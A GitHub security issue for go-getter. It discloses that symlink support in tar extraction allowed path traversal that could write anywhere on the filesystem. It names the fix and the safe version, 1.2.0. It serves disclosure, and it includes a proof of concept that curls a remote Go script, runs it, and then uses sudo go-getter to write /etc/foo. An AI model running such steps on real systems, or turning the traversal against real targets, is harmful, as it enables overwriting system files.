Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

go-getter allowed arbitrary filesystem access via symlinks #175

Closed
schmichael opened this issue Mar 26, 2019 · 0 comments
Closed

go-getter allowed arbitrary filesystem access via symlinks #175

schmichael opened this issue Mar 26, 2019 · 0 comments
Labels
bug

Comments

@schmichael
Copy link
Member

#171 introduced symlink support for tar archives, but unlike GNU tar did not protect against arbitrary path traversal via symlinks. A specially crafted tarball could write to any location on the filesystem the process has access to.

#174 reverted #171, but users are encouraged to ensure they are not using d9c5f68 as a library or command line tool.

go-getter 1.2.0 is safe from this path traversal issue.

Proof of concept

curl https://gist.githubusercontent.com/schmichael/12dc47df77dc210fd6c573db01f35cb1/raw/849ec6dd1e599b02bbd1428e93391d29bc301b52/write.go > write.go
go run write.go

# Show that GNU tar is safe
sudo tar xvf etc-foo.tar
# You should see an error. "etc" will exist but not "etc/foo"
rm etc

# Must run getter from another directory
gzip etc-foo.tar
mkdir tmp
cd tmp
sudo go-getter ../etc-foo.tar.gz .
sudo cat etc/foo
# Outputs "foo"
sudo cat /etc/foo
# Outputs "foo"

Script to generate tarball: https://gist.github.com/schmichael/12dc47df77dc210fd6c573db01f35cb1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@schmichael